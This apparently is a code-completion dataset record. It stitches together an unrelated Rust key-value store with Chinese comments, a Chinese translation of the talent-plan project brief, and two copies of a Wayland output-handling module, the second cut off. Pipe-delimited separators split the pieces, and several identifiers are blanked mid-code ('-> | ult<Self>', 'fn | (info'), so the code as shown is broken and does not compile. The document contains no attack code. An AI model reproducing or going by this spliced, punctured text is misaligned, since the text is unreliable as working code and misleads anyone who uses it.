index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> | ult<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/
| Res | identifier_name |
output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn | (info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
}
| merge_event | identifier_name |
output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
